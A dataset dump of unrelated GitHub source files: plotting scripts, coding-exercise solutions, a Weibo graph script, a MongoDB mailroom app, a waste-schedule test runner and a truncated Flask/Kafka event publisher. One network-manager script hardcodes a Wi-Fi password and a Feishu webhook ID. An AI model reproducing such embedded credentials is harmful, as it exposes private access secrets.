True,\n 'pgf.rcfonts': False,\n})\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nARTICLE_DIR = os.path.join(BASE_DIR,\"article\",\"lak2021\")\n\n#careful if dir names change\nRESULTS_DIR = os.path.join(BASE_DIR,\"tmp\",\"fine_grained_arg_rankings\")\n\ndef switch_exp_summary(x):\n d={}\n d[\"n\"]=x[\"timestep\"].max()\n d[\"acc_LR\"]=np.round(\n accuracy_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_LR\"]\n ),4\n )\n d[\"acc_RF\"]=np.round(\n accuracy_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_RF\"]\n ),4\n )\n d[\"f1_LR\"]=np.round(\n f1_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_LR\"]\n ),4\n )\n d[\"f1_RF\"]=np.round(\n f1_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_RF\"]\n ),4\n )\n\n return pd.Series(d,index=[\"n\",\"acc_LR\",\"acc_RF\",\"f1_LR\",\"f1_RF\"])\n\n\ndef summary_by_disc(x):\n d={}\n d[\"n\"]=\"{:0.0f}\".format(x[\"n\"].sum())\n d[\"acc_LR\"]=\"{:0.2f} ({:0.2f})\".format(\n 
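# weighted mean over topics (weights = per-topic sample count n); the std reported next to it is unweighted\n 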
np.average(x[\"acc_LR\"],weights=x[\"n\"]),\n np.std(x[\"acc_LR\"])\n )\n d[\"acc_RF\"]=\"{:0.2f} ({:0.2f})\".format(\n np.average(x[\"acc_RF\"],weights=x[\"n\"]),\n np.std(x[\"acc_RF\"])\n )\n return(pd.Series(d,index=[\"n\",\"acc_LR\",\"acc_RF\"]))\n\n\n\n\ndef main():\n disciplines=[\"Physics\",\"Chemistry\",\"Biology\"]\n\n ###########\n # accuracy\n results=[]\n cols=[\"topic\",\"timestep\",\"test_answer_id\",\"n\",\"y_true\"]\n cols_pred=[\"prediction_LR\",\"prediction_RF\"]\n\n for discipline in disciplines:\n results_dir_discipline = os.path.join(RESULTS_DIR,discipline,\"results\")\n topics=os.listdir(results_dir_discipline)\n for topic in topics:\n fp=os.path.join(results_dir_discipline,topic)\n with open(fp,\"r\") as f:\n d=json.load(f)\n for dt in d:\n if dt:\n dtf={c:dt[c] for c in cols}\n for c in cols_pred:\n dtf.update({c:dt[c][0]})\n dtf.update({\"discipline\":discipline})\n results.append(dtf)\n df=pd.DataFrame(results)\n\n df_d=df.groupby([\"discipline\",\"topic\"]).apply(lambda x: switch_exp_summary(x))\n\n\n df_final=df_d.groupby(\"discipline\").apply(lambda x: summary_by_disc(x))\n\n fp=os.path.join(ARTICLE_DIR,\"data\",\"switch_exp_acc.tex\")\n df_final.to_latex(fp)\n\n #####################\n # feature importances\n results_f=[]\n cols=[\"topic\",\"timestep\",\"n\"]\n cols_features=[\"feature_names_LR\",\"feature_names_RF\"]\n disciplines=[\"Biology\",\"Chemistry\",\"Physics\"]\n for discipline in disciplines:\n results_dir_discipline = os.path.join(RESULTS_DIR,discipline,\"results\")\n topics=os.listdir(results_dir_discipline)\n for topic in topics:\n fp=os.path.join(results_dir_discipline,topic)\n with open(fp,\"r\") as f:\n d=json.load(f)\n for dt in d:\n if dt:\n for col_feature in cols_features:\n dtfa={\n \"topic\":topic,\n \"model\":col_feature[-2:],\n \"timestep\":dt[\"timestep\"],\n \"pred_true\":bool(\n dt[\"prediction_{}\".format(col_feature[-2:])][0]==dt[\"y_true\"]\n )\n }\n dtf=dt[col_feature]\n for weight,feature_name in dtf:\n dtfa.update({feature_name:weight})\n dtfa.update({\"discipline\":discipline})\n results_f.append(dtfa)\n dff=pd.DataFrame(results_f)\n # dff.groupby(\"discipline\").size()\n cols_features=['rationale_word_count',\n 'shown_rationale_word_count_mean', 'shown_convincingness_BT_mean',\n 'shown_convincingness_baseline_mean', 'shown_rationale_word_count_max',\n 'shown_convincingness_BT_max', 'shown_convincingness_baseline_max',\n 'shown_rationale_word_count_min', 'shown_convincingness_BT_min',\n 'shown_convincingness_baseline_min', 'n_shown_short',\n 'n_shown_shorter_than_own', 'n_shown_longer_than_own', 'first_correct']\n\n dfrf=dff[dff[\"model\"]==\"RF\"].copy()\n\n means=dfrf[cols_features].mean()\n stds=dfrf[cols_features].std()\n\n df_means=means.to_frame().rename(columns={0:\"mean\"}).join(\n stds.to_frame().rename(columns={0:\"std\"})\n ).sort_values(\"mean\",ascending=False)\n\n ftypes=[]\n for f in list(df_means.index):\n if \"baseline\" in f:\n ftypes.append(\"WinRate\")\n elif \"BT\" in f:\n ftypes.append(\"BT\")\n else:\n ftypes.append(\"Surface\")\n df_means[\"type\"]=ftypes\n\n\n df_means.index=df_means.index\\\n .str.replace(\"shown_\",\"\")\\\n .str.replace(\"convincingness_\",\"\")\\\n .str.replace(\"baseline\",\"WinRate\")\\\n .str.replace(\"rationale_\",\"\")\\\n .str.replace(\"word_count\",\"WC\")\n\n colors={\n \"Surface\":\"lightgrey\",\n \"WinRate\":\"red\",\n \"BT\":\"royalblue\"\n }\n\n df_means[\"color\"]=df_means[\"type\"].map(colors)\n\n # df_means\n plt.bar(\n x=df_means.index,\n 
height=df_means[\"mean\"],\n yerr=df_means[\"std\"],\n color=df_means[\"color\"],\n error_kw=dict(ecolor='gray', lw=1, capsize=2, capthick=1)\n )\n plt.xticks(range(df_means.shape[0]),df_means.index,rotation=75)\n plt.ylabel(\"Average Feature Importance in Random Forest\")\n fp=os.path.join(ARTICLE_DIR,\"img\",\"switch_exp_RF.pgf\")\n plt.savefig(fp)\n\nif __name__ == \"__main__\":\n import plac\n\n plac.call(main)\n","repo_name":"sameerbhatnagar/convincingness","sub_path":"code/publication_plots/switch_exp_results.py","file_name":"switch_exp_results.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18770159141","text":"'''\n분류 : 그리디 알고리즘\n문제 : 컵홀더 (백준 2810)\n작성일자 : 2021.03.13\n'''\n# 좌석 양 끝에 컵홀더가 1개씩 있고, 커플석에는 가운데는 없다\n## 목적 : 컵을 꽂을 수 있는 최대 사람의 수 출력\n## 접근 : 현재 자리에서 최대한 사용할 수 있는 컵홀더 모두 사용\n## 첫 커플석 자리만 2개 사용가능 하다는 조건 찾아내기\n## LL을 L로 바꾸는 방법은 replace를 사용 가능하다 \n# seats = input().replace('LL','L')\n### 아니면 L의 개수를 모두 더한뒤 나누기 2를 해주면 L을 한번만 세는 걸로도 가능하다\nN = int(input())\ncup = input()\nseats = []\nfor s in cup : \n seats.append(s)\ns_cnt = seats.count('S')\nl_cnt = seats.count('L')//2\nif l_cnt == 1 : \n print(s_cnt+2)\nelif l_cnt > 1 : \n print(s_cnt+l_cnt+1)\nelse : \n print(s_cnt)","repo_name":"ykiseong303/ProblemSolving","sub_path":"Baekjoon_python/greedy/greedy_35.py","file_name":"greedy_35.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33938428854","text":"#coding:utf-8\nfrom weibocrawler import dboperator\nfrom weibocrawler import DirOperator\nfrom weibocrawler.config import getconfig\nfrom networkx import *\nimport networkx as nx\nimport csv\n\n'''得到种子群体UserId'''\ndef getUserId():\n\tcfg = getconfig()\n\tCollection_UserHomePages = cfg['Collections']['UserHomePages']\n\tdbo = dboperator.Dboperator(collname = Collection_UserHomePages)\n\tuserIds = dbo.coll.distinct(\"userId\")\n\t# print(len(userIds))\n\treturn userIds\n\ndef output_extend_users(dbo,extend_users_dir):\n\tcursor = dbo.coll.find({},{\"followeeId\":1, \"userId\": 1})\n\tedge_list = list()\n\tfor c in cursor:\n\t\t# str_pair = str(c[\"userId\"])+\",\"+str(c[\"followeeId\"])\n\t\t# t = tuple(str_pair.split(','))\n\t\tt = (c[\"userId\"],c[\"followeeId\"])\n\t\tedge_list.append(t)\n\tG = nx.DiGraph()\n\tG.add_edges_from(edge_list)\n\tG1 = nx.Graph(G)\n\tdict_x = clustering(G1)\n\tsort_x = sorted(dict_x.items(), key=lambda item: item[1], reverse=True)\n\tuserIds = getUserId()\n\n\toutput_filename = extend_users_dir + 'extend_users.csv'\n\tcsvfile = open(output_filename,'w',newline=\"\")\n\twriter = csv.writer(csvfile,dialect='excel')\n\twriter.writerow(['用户ID', '权重'])\n\n\tfor x, y in sort_x:\n\t\t# print(str(x)+':'+str(y))\n\t\tif x in userIds:\n\t\t\tcontinue\n\t\telse:\n\t\t\tif y > 0:\n\t\t\t\twriter.writerow([str(x), str(y)])\n\tcsvfile.close()\n\ndef main():\n\tcfg = getconfig()\n\tCollection_UserRelations = cfg['Collections']['UserRelations']\n\tdbo = dboperator.Dboperator(collname = Collection_UserRelations)\n\n\tdb_name = cfg['MongoDBConnection']['db']\n\toutput_dir = 'DATA//' + db_name\n\tDirOperator.DirOperator(output_dir)\n\textend_users_dir = 
output_dir+'//'\n\t\n\toutput_extend_users(dbo,extend_users_dir)\n\tdbo.connclose()\n","repo_name":"dbc1040/WeiboCrawler","sub_path":"weibocrawler/output_extend_users.py","file_name":"output_extend_users.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2416624257","text":"name_1,name_2 = input().split()\nf1 = open(name_1,'r')\nf2 = open(name_2,'r')\nf1_line = f1.readlines()\nf2_line = f2.readlines()\nsum = f1_line+f2_line\n\nsum = [x.split() for x in sum]\nsum = [[a[-2:],[a,b]] for a,b in sum]\nsum.sort()\nfor x in sum:\n print(x[1][0],x[1][1])\n\n\nf1.close()\nf2.close()\n","repo_name":"blazxex/2110101_CompProg","sub_path":"07_StrFile/07_StrFile_File_Merge.py","file_name":"07_StrFile_File_Merge.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15600002153","text":"\"\"\"\nModule containing code for a workflow service.\n\"\"\"\nfrom uuid import UUID\nfrom internal.database import Session\nfrom internal.database.model import new_workflow\nfrom internal.database.query import select_workflow, update_workflow, delete_workflow\nfrom internal.service.model.dto import WorkflowDto\nfrom internal.transport.model.contracts import WorkflowSettings\n\n\nclass WorkflowService:\n \"\"\"\n A service class for working with processing workflows.\n \"\"\"\n\n @staticmethod\n def add_workflow(id: UUID, settings: WorkflowSettings):\n \"\"\"\n Method for adding a new workflow in the system.\n \"\"\"\n session = Session()\n session.add(new_workflow(\n id,\n settings.is_full_page_recognition,\n settings.skip_img_enchancement,\n settings.expect_diff_images\n ))\n session.commit()\n\n @staticmethod\n def get_workflow(workflow_id: UUID):\n session = Session()\n rows = session.execute(select_workflow(workflow_id)).all()\n session.commit()\n if len(rows) == 0: return None\n return [WorkflowDto(row[0], row[1], row[2], row[3]) for row in rows][0]\n\n @staticmethod\n def delete_workflow(workflow_id: UUID):\n \"\"\"\n A method for deleting a specific workflow in the system.\n \"\"\"\n session = Session()\n session.execute(delete_workflow(workflow_id))\n session.commit()\n\n @staticmethod\n def update_workflow(id: UUID, settings: WorkflowSettings) -> bool:\n \"\"\"\n A method for updating a specific workflow.\n \"\"\"\n session = Session()\n session.execute(\n update_workflow(WorkflowDto(\n id,\n settings.is_full_page_recognition,\n settings.expect_diff_images,\n settings.skip_img_enchancement)\n )\n )\n session.commit()\n return True\n","repo_name":"MichalMoudry/mrf-recognition-service","sub_path":"src/internal/service/workflow_service.py","file_name":"workflow_service.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73341170348","text":"#!/bin/env python3\n# coding: utf8\n\"\"\"\n@File Name : bin/send_message_to_feishu.py\n@Author : LeeCQ\n@Date-Time : 2023/9/19 14:53\n\n网络管理\n\"\"\"\n\nimport logging\nfrom pathlib import Path\n\nimport typer\nimport yaml\n\nimport _base\n\n_base.logging_configurator(\n name=\"network-manager\",\n console_print=True,\n console_level=\"INFO\" if _base.IS_SYSTEMD else \"DEBUG\",\n file_level=\"DEBUG\" if _base.IS_SYSTEMD else \"INFO\",\n)\n\nlogger = logging.getLogger(\"host-service.bin.network-manager\")\napp = typer.Typer()\n\nCONFIG = \"\"\"\nversion: 1\n\nwifi:\n - ssid: 
ziroom302\n password: 4001001111\n \n - ssid: WalmartGuest\n mac: c8:03:ed:33:a0:ad\n \nfeishu:\n hook_id: 9e40f223-0199-438a-a620-cf01b443dabc\n keyword: null\n\"\"\"\n\n\n@app.command()\ndef auto_connect_wifi(config_file: Path):\n \"\"\"自动连接Wi-Fi\"\"\"\n from network_manager.auto_connect_wifi import AutoConfigWifi, WifiConfig\n\n config_dict = yaml.safe_load(config_file.read_text(encoding=\"utf8\"))\n logger.info(\"Loaded Config File Success.\")\n\n config = AutoConfigWifi([WifiConfig(**{k: str(v) for k,v in wifi.items()}) for wifi in config_dict[\"wifi\"]])\n status = config.connect()\n logger.info(\"Connect Wi-Fi: %s\", status)\n\n from send_ip_to_feishu import send_ip\n\n return send_ip(**config_dict[\"feishu\"])\n\n\nif __name__ == \"__main__\":\n app()","repo_name":"lee-cq/host-service","sub_path":"bin/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595298158","text":"#!/usr/bin/env python3\n\n'''\nAuthor: Eric Rosko\nLesson: Session 8\nFile: mailroom.py\nDate: june 3, 2018\nDescription:\n Session 8 homework. This is my mongodb implementation of the mailroom\n program.\n\nUsage:\n python3 mailroom.py\n'''\n\nimport logging\nfrom peewee import *\nfrom operator import *\nimport io\nimport login_database\nimport pprint\nimport utilities\nimport learn_data\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.info('Starting logger...')\n\n\ndef add_donation():\n fullname = input(\"Enter name of donor: \")\n amount = input(\"Enter donation amount: \")\n mailroom.add_donation(fullname, amount)\n\n list_donations()\n\n\ndef list_donations():\n print(\"Current list of donations: \")\n print(mailroom.printable_donations())\n print()\n\n\ndef rename_donor():\n old_name = input(\"Enter current name of donor: \")\n new_name = input(\"Enter new name of donor:\")\n mailroom.rename_donations(old_name, new_name)\n\n list_donations()\n\n\ndef delete_donor():\n fullname = input(\"Enter name of donor to delete: \")\n mailroom.delete_donations(fullname)\n list_donations()\n\n\ndef store_secret():\n fullname = input(\"Enter name of donor: \")\n secret = input(\"Enter the secret data to temporarily store: \")\n mailroom.store_temporary_data(fullname, secret)\n\n\ndef retrieve_secret():\n fullname = input(\"Enter name of donor to retrieve secret note: \")\n print(\"THE SECRET IS:\", mailroom.retrieve_temporary_data(fullname))\n\n\nclass MailroomMongo():\n\n def __init__(self):\n pass\n\n\n def add_donor(self, name):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donors = db['donors']\n\n results = donors.insert_one({'name': name})\n\n\n def get_donors(self):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donors = db['donors']\n\n cursor = donors.find({}).sort('name', 1)\n\n all_donors = []\n for doc in cursor:\n all_donors.append(doc['name'])\n # print(f\"Name: {doc['name']}\")\n\n return all_donors\n\n\n def add_donation(self, donor, amount):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n result = donations.insert_one({\n 'donor': donor,\n 'amount': amount})\n print(\"added\", result)\n\n\n def get_donations(self, donor):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n list_donations = []\n cursor = donations.find({\"donor\": 
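\n # Mongo filter: match every donation document whose donor field equals the given name\n 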
{\"$eq\": donor}})\n for doc in cursor:\n # print(doc['amount'], doc['donor'])\n d = doc['amount']\n list_donations.append(d)\n return list_donations\n\n\n def rename_donations(self, old_name, new_name):\n if old_name == new_name:\n return\n\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n cursor = donations.find({\"donor\": {\"$eq\": old_name}})\n for doc in cursor:\n d = doc['amount']\n self.add_donation(new_name, d)\n\n donations.delete_many({\"donor\": {\"$eq\": old_name}})\n\n\n def delete_donations(self, donor):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n donations.delete_many({\"donor\": {\"$eq\": donor}})\n\n\n def printable_donations(self):\n\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n output = \"\"\n cursor = donations.find({})\n for doc in cursor:\n output += f\"Donor: {doc['donor']} Amount: ${doc['amount']}\\n\"\n # print(doc['amount'], doc['donor'])\n\n return output\n\n\n def wipe_database(self):\n with login_database.login_mongodb_cloud() as client:\n client['mailroom'].drop_collection('donors')\n client['mailroom'].drop_collection('donations')\n\n\n def store_temporary_data(self, donor, secret_data):\n r = login_database.login_redis_cloud()\n r.set(donor, secret_data)\n\n\n def retrieve_temporary_data(self, donor):\n r = login_database.login_redis_cloud()\n return r.get(donor)\n\n\nmailroom = MailroomMongo()\n\n\nif __name__ == \"__main__\":\n isRunning = True\n\n while isRunning:\n choice = input(\"1.) Add donation\\n\"\n \"2.) Rename donor\\n\"\n \"3.) Delete donor\\n\"\n \"4.) Show donors\\n\"\n \"5.) Store temp data for donor\\n\"\n \"6.) 
Retrieve temp data for donor\\n\"\n \"Choice (q to quit):\" )\n\n if choice == 'q':\n isRunning = False\n elif choice == '1':\n add_donation()\n elif choice == '4':\n list_donations()\n elif choice == '2':\n rename_donor()\n elif choice == '3':\n delete_donor()\n elif choice == '5':\n store_secret()\n elif choice == '6':\n retrieve_secret()\n else:\n print(\"Bad input: {}\\n\".format(choice))\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/eric_rosko/lesson-08/src/mailroom_mongo.py","file_name":"mailroom_mongo.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2512455507","text":"\"\"\"\nPython Exercise 011.\n\nWrite a program that reads the width and the height of a wall in meters, computes\nits area and the amount of paint needed to paint it, knowing that each\nliter of paint covers an area of 2 square meters.\n\"\"\"\n\nlar = float(input('Wall width: '))\nalt = float(input('Wall height: '))\na = lar * alt\nprint('Your wall measures {}x{} and its area is {}m².\\n'\n 'To paint this wall, you will need {}lt of paint.'\n .format(lar, alt, a, (a/2)))\n","repo_name":"gustavogattino/Curso-em-Video-Python","sub_path":"Exercicios/ex011.py","file_name":"ex011.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74146187948","text":"#!/usr/bin/env python3\n\nimport argparse\nimport datetime\nimport importlib\nimport re\nimport site\nimport traceback\nfrom pathlib import Path\n\nimport yaml\n\nSECRET_FILENAME = \"secrets.yaml\"\nSECRET_REGEX = re.compile(r\"!secret\\s(\\w+)\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Test sources.\")\n parser.add_argument(\n \"-s\", \"--source\", action=\"append\", help=\"Test given source file\"\n )\n parser.add_argument(\n \"-l\", \"--list\", action=\"store_true\", help=\"List retrieved entries\"\n )\n parser.add_argument(\n \"-i\", \"--icon\", action=\"store_true\", help=\"Show waste type icon\"\n )\n parser.add_argument(\"--sorted\", action=\"store_true\", help=\"Sort output by date\")\n parser.add_argument(\"--weekday\", action=\"store_true\", help=\"Show weekday\")\n parser.add_argument(\n \"-t\",\n \"--traceback\",\n action=\"store_true\",\n help=\"Print exception information and stack trace\",\n )\n parser.add_argument(\n \"-I\", \"--ics\", action=\"store_true\", help=\"Test all .yaml files for ICS source\"\n )\n parser.add_argument(\n \"-y\", \"--yaml\", action=\"append\", help=\"Test given .yaml file for ICS source\"\n )\n args = parser.parse_args()\n\n # read secrets.yaml\n secrets = {}\n try:\n with open(SECRET_FILENAME) as stream:\n try:\n secrets = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n except FileNotFoundError:\n # ignore missing secrets.yaml\n pass\n\n package_dir = Path(__file__).resolve().parents[2]\n source_dir = package_dir / \"waste_collection_schedule\" / \"source\"\n\n # add module directory to path\n site.addsitedir(str(package_dir))\n\n # find all source files for testing\n if args.source is not None:\n # source file(s) given\n source_files = args.source\n elif not args.ics and args.yaml is None:\n # no ICS yaml files given --> test all source files\n source_files = filter(\n lambda x: x != \"__init__\",\n map(lambda x: x.stem, source_dir.glob(\"*.py\")),\n )\n else:\n # ICS yaml file(s) given\n source_files = 
[]\n\n for f in sorted(source_files):\n # iterate through all *.py files in waste_collection_schedule/source\n print(f\"Testing source {f} ...\")\n module = importlib.import_module(f\"waste_collection_schedule.source.{f}\")\n\n # get all names within module\n names = set(dir(module))\n\n # test if all mandatory names exist\n assert \"TITLE\" in names\n assert \"DESCRIPTION\" in names\n assert \"URL\" in names\n assert \"TEST_CASES\" in names\n\n # run through all test-cases\n for name, tc in module.TEST_CASES.items():\n # replace secrets in arguments\n replace_secret(secrets, tc)\n\n test_fetch(module, name, tc, args)\n\n # find all ICS yaml files for testing\n ics_yaml_dir = Path(__file__).resolve().parents[4] / \"doc\" / \"ics\" / \"yaml\"\n if args.ics:\n # test all ICS yaml files\n yaml_files = ics_yaml_dir.glob(\"*.yaml\")\n elif args.yaml:\n # ICS yaml files specified\n yaml_files = [Path(ics_yaml_dir, f).with_suffix(\".yaml\") for f in args.yaml]\n elif args.source is None:\n # neither source nor ICS yaml files specified --> test all yaml files\n yaml_files = ics_yaml_dir.glob(\"*.yaml\")\n else:\n # source files given --> don't test ICS yaml files\n yaml_files = []\n\n # run through all .yaml files for ICS source\n module = importlib.import_module(\"waste_collection_schedule.source.ics\")\n for f in sorted(yaml_files):\n print(f\"Testing ICS {f.stem}\")\n with open(f) as stream:\n # read yaml file\n data = yaml.safe_load(stream)\n\n # run through all test-cases\n for name, tc in data[\"test_cases\"].items():\n test_fetch(module, name, tc, args)\n\n\ndef test_fetch(module, name, tc, args):\n # create source\n try:\n source = module.Source(**tc)\n result = source.fetch()\n count = len(result)\n if count > 0:\n print(f\" found {bcolors.OKGREEN}{count}{bcolors.ENDC} entries for {name}\")\n else:\n print(f\" found {bcolors.WARNING}0{bcolors.ENDC} entries for {name}\")\n\n # test if source is returning the correct date format\n if len(list(filter(lambda x: type(x.date) is not datetime.date, result))) > 0:\n print(\n f\"{bcolors.FAIL} ERROR: source returns invalid date format (datetime.datetime instead of datetime.date?){bcolors.ENDC}\"\n )\n\n if args.list:\n result = sorted(result, key=lambda x: x.date) if args.sorted else result\n for x in result:\n icon_str = f\" [{x.icon}]\" if args.icon else \"\"\n weekday_str = x.date.strftime(\"%a \") if args.weekday else \"\"\n print(f\" {x.date.isoformat()} {weekday_str}: {x.type}{icon_str}\")\n except KeyboardInterrupt:\n exit()\n except Exception as exc:\n print(f\" {name} {bcolors.FAIL}failed{bcolors.ENDC}: {exc}\")\n if args.traceback:\n print(indent(traceback.format_exc(), 4))\n\n\ndef replace_secret(secrets, d):\n for key in d.keys():\n value = d[key]\n if isinstance(value, dict):\n replace_secret(secrets, value)\n elif isinstance(value, str):\n match = SECRET_REGEX.fullmatch(value)\n if match is not None:\n id = match.group(1)\n if id in secrets:\n d[key] = secrets[id]\n else:\n print(f\"identifier '{id}' not found in {SECRET_FILENAME}\")\n\n\ndef indent(s, count):\n indent = \" \" * count\n return \"\\n\".join([indent + line for line in s.split(\"\\n\")])\n\n\nclass bcolors:\n HEADER = \"\\033[95m\"\n OKBLUE = \"\\033[94m\"\n OKCYAN = \"\\033[96m\"\n OKGREEN = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n ENDC = \"\\033[0m\"\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n\n\nif __name__ == \"__main__\":\n 
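# example invocation (source name is illustrative): python test_sources.py -s <source> -l\n 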
main()\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/test/test_sources.py","file_name":"test_sources.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"74007920106","text":"\"\"\"\nauthor: buppter\ndatetime: 2019/9/12 9:26\n\"\"\"\n\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n max_len = 0\n sub = []\n for i in s:\n if i not in sub:\n sub.append(i)\n else:\n max_len = max(max_len, len(sub))\n sub = sub[sub.index(i) + 1:]\n sub.append(i)\n return max(max_len, len(sub))\n","repo_name":"buppter/algorithms","sub_path":"LeetCodeHot100/3_Longest_Substring_Without_Repeating_Characters.py","file_name":"3_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"22960915522","text":"\"\"\"\r\nAn object that represents a run\r\nAuthor: Andrew Jarombek\r\nDate: 9/20/2018\r\n\"\"\"\r\n\r\n\r\nclass Run:\r\n\r\n def __init__(self, miles=0, minutes=0, seconds=0):\r\n \"\"\"\r\n Construct a Run instance\r\n :param miles: the miles run. This parameter defaults to 0 if no argument is passed\r\n :param minutes: the minutes spent running. This parameter defaults to 0 if no argument\r\n is passed\r\n :param seconds: the seconds spent running. This parameter defaults to 0 if no argument\r\n is passed\r\n \"\"\"\r\n miles = miles if miles >= 0 else 0\r\n minutes = minutes if minutes >= 0 else 0\r\n seconds = seconds if seconds >= 0 else 0\r\n\r\n self.miles = miles\r\n self.minutes = minutes\r\n self.minutes += seconds // 60\r\n self.seconds = seconds % 60\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Special method used to get the string representation of an object. It is invoked by\r\n both print() and str() among others. This method is also a fallback from the __str__()\r\n special method\r\n :return: a String representation of the Run object\r\n \"\"\"\r\n seconds = str(self.seconds) if self.seconds >= 10 else '0%r' % self.seconds\r\n return '%r miles in %r:%s' % (self.miles, self.minutes, seconds)\r\n\r\n def __bool__(self):\r\n \"\"\"\r\n A special method used to check if the object is truthy or falsy. An object is falsy if\r\n all the miles, minutes, and seconds properties equal 0. Otherwise, it is truthy.\r\n :return: True if the object is truthy, False otherwise\r\n \"\"\"\r\n return self.miles > 0 or self.minutes > 0 or self.seconds > 0\r\n\r\n def __add__(self, other):\r\n \"\"\"\r\n A special method used with the addition operator (+). This method is invoked if two\r\n Run objects are added together.\r\n :param other: another object to add to this object\r\n :return: a new Run object with the two previous Run objects properties added together\r\n \"\"\"\r\n miles = self.miles + other.miles\r\n seconds = self.seconds + other.seconds\r\n minutes = seconds // 60\r\n seconds = seconds % 60\r\n minutes += self.minutes + other.minutes\r\n\r\n return Run(miles, minutes, seconds)\r\n\r\n def __lshift__(self, other):\r\n \"\"\"\r\n A special method used with the left shift operator (<<). This method is invoked if a\r\n Run object is left shifted with another object. 
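For example, Run(5, 40) << 2 yields a new Run of 7 miles with the same time. 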
NOTE: This method breaks the convention\r\n of using the left shift operator for a bitwise operation.\r\n :param other: another object to left shift with this object (should be a number)\r\n :return: a new Run object with the other object added to the miles run of the current\r\n Run object.\r\n \"\"\"\r\n new_mileage = self.miles + other\r\n new_mileage = new_mileage if new_mileage > 0 else 0\r\n\r\n return Run(new_mileage, self.minutes, self.seconds)\r\n","repo_name":"AJarombek/jarombek-com-sources","sub_path":"2018/09-Sep/9-24-python-data-model/Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32128271439","text":"import flask\nimport cgi\nimport json\nimport threading\nimport logging\nfrom queue import Queue\nfrom collections import defaultdict\nfrom kafka import KafkaConsumer\nfrom flask_cors import CORS, cross_origin\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\nlogging.getLogger('flask_cors').level = logging.DEBUG\nCORS(app, resources={r\"*\": {\"origins\": \"*\"}})\n\nclass EventsConsumer(object):\n def __init__(self, event_publisher):\n self.event_publisher = event_publisher\n self.consumer = KafkaConsumer(\n 'test',\n bootstrap_servers=['localhost:9092'],\n value_deserializer=lambda x: json.loads(x.decode('utf-8')))\n \n def listen(self):\n logging.info('starting the listen thread')\n for message in self.consumer:\n message = message.value\n self.event_publisher.emit_broadcast(message, message['external_tenant'])\n\n def start(self):\n '''\n create new thread to avoid blocking the flask server\n '''\n self.message_listenner = threading.Thread(target=self.listen, args=())\n self.message_listenner.start()\n \n \n\nclass EventPublisher(object):\n END_STREAM = {}\n def __init__(self):\n '''\n new event publisher for users\n initialize with empty list\n '''\n self.users_by_channel = defaultdict(list)\n \n def get_channel_users(self, channel='broadcast'):\n '''\n get the list of users for a specific channel\n '''\n return self.users_by_channel[channel]\n\n def emit_single_user(self, data, queue):\n \"\"\"\n Emits event only to a single user\n \"\"\"\n event_id = data[\"event\"]\n str_data = json.dumps(data)\n queue.put('event: ' + event_id)\n queue.put('\\n')\n queue.put('data: ' + str_data)\n queue.put('\\n\\n')\n\n def emit_broadcast(self, data, channel='broadcast'):\n '''\n global emitter for every user connected to a channel\n '''\n if callable(data):\n for queue, properties in self.get_channel_users(channel):\n value = data(properties)\n if value:\n self.emit_single_user(value, queue)\n else:\n for queue, _ in self.get_channel_users(channel):\n self.emit_single_user(data, queue)\n\n def join_channel(self, channel, properties=None, initial_data=[]):\n '''\n every user will be joined to the broadcast channel and a custom one;\n the custom channel represents the tenant \n '''\n queue = Queue()\n properties = properties or {}\n subscriber = (queue, properties)\n\n '''\n we can emit some initial events right after the user subscribes to the event stream\n '''\n for data in initial_data:\n 